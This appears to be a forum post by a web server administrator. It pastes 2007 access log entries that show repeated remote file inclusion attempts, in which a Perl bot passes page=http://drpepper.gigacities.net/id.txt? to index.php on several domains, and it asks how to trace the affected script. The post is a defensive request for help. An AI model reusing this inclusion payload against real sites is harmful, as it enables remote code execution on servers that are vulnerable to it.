CODE
Request: neysajin.com 70.85.x.x - - [10/Oct/2007:01:47:47 -0400]"GET
/index.php?lang=en&page=http://drpepper.gigacities.net/id.txt? HTTP/1.1" 500
542 "-""libwww-perl/5.808" - "-"
Request: legacyfamily.org 70.85.x.x - - [10/Oct/2007:01:51:08 -0400]
"GET /index.php?lang=en&page=http://drpepper.gigacities.net/id.txt?
HTTP/1.1" 500 546 "-""libwww-perl/5.808" - "-"
Request: leeastwoodarch.com 70.85..x.x - - [10/Oct/2007:01:57:12 -0400]
"GET /index.php?lang=en&page=http://drpepper.gigacities.net/id.txt?
HTTP/1.1" 500 548 "-""libwww-perl/5.808" - "-"
Request: aggiebsm.org 70.85..x.x - - [10/Oct/2007:01:57:37 -0400]"GET
/index.php?lang=en&page=http://drpepper.gigacities.net/id.txt? HTTP/1.1" 500
542 "-""libwww-perl/5.808" - "-"
/index.php?lang=en&page=http://drpepper.gigacities.net/id.txt? HTTP/1.1" 500
542 "-""libwww-perl/5.808" - "-"
Request: legacyfamily.org 70.85.x.x - - [10/Oct/2007:01:51:08 -0400]
"GET /index.php?lang=en&page=http://drpepper.gigacities.net/id.txt?
HTTP/1.1" 500 546 "-""libwww-perl/5.808" - "-"
Request: leeastwoodarch.com 70.85..x.x - - [10/Oct/2007:01:57:12 -0400]
"GET /index.php?lang=en&page=http://drpepper.gigacities.net/id.txt?
HTTP/1.1" 500 548 "-""libwww-perl/5.808" - "-"
Request: aggiebsm.org 70.85..x.x - - [10/Oct/2007:01:57:37 -0400]"GET
/index.php?lang=en&page=http://drpepper.gigacities.net/id.txt? HTTP/1.1" 500
542 "-""libwww-perl/5.808" - "-"
However I'm somewhat unsure of where to look.
Obviously (at least I think so), I see that index.php is being used to attempt an HTTP exploit on another webserver. Indicated by the ?lang=en&page=xxxx part.
Any idea as to where I might look to see exactly which index.php is being used? lol..or maybe which directory?
Thanks
